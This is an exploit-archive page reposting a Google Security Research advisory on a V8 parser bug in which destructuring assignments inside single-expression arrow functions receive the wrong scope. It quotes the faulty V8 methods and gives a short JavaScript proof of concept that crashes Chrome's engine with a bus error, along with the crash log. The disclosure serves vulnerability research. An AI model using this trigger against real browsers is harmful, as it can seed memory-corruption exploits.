Google Chrome V8 Arrow Function Scope Fixing Bug

Google Chrome V8 Arrow Function Scope Fixing Bug: Posted Apr 26, 2018; Authored by Google Security Research, lokihardt; Google Chrome V8 suffers from an arrow function scope fixing bug.; tags | exploit; SHA-256 | 24f3824206b56675fc861c6cdc7ec310f3cd9a072873f501aa8fd3d6295dfdca; Download | Favorite | View

Google Chrome V8 Arrow Function Scope Fixing Bug

Chrome: V8: Arrow function scope fixing bug 




When the parser parses the parameter list of an arrow function contaning destructuring assignments, it can't distinguish whether the assignments will be actually in the parameter list or just assignments until it meets a "=>" token. So it first assigns the destructuring assignments to the outer scope, and fixs the scope when it meets the "=>" token.

Here's the methods used to fix the scope (<a href="https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=407" title="" class="" rel="nofollow">https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=407</a>).

    void RewindDestructuringAssignments(int pos) {
      destructuring_assignments_to_rewrite_.Rewind(pos);
    }

    void SetDestructuringAssignmentsScope(int pos, Scope* scope) {
      for (int i = pos; i < destructuring_assignments_to_rewrite_.length();
           ++i) {
        destructuring_assignments_to_rewrite_[i]->set_scope(scope);
      }
    }

Since the SetDestructuringAssignmentsScope method changes the scope from "pos" to the end of the list, it needs to call the RewindDestructuringAssignments method after fixing the scope. But the RewindDestructuringAssignments method is only called when the arrow function's body starts with a "{" token (<a href="https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=4418" title="" class="" rel="nofollow">https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=4418</a>).

So it can't properly handle the following case where a destructuring assignment expression containing a single line arrow function. It will set the scope of the inner destructuring assignments to the outer arrow function's scope.

PoC:
(({a = (async ({b = {a = c} = {
    a: 0x1234
}}) => 1)({})}, c) => 1)({});

Log:
Received signal 10 BUS_ADRERR 12340000001f

==== C stack trace ===============================

 [0x00010edde85e]
 [0x7fff53e54f5a]
 [0x000000000000]
 [0x7eb48331b6d8]
 [0x7eb48331b6d8]
[end of stack trace]
Bus error: 10



Found by: lokihardt

Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Google Chrome V8 Arrow Function Scope Fixing Bug

Google Chrome V8 Arrow Function Scope Fixing Bug

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Google Chrome V8 Arrow Function Scope Fixing Bug

Share This

Google Chrome V8 Arrow Function Scope Fixing Bug

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems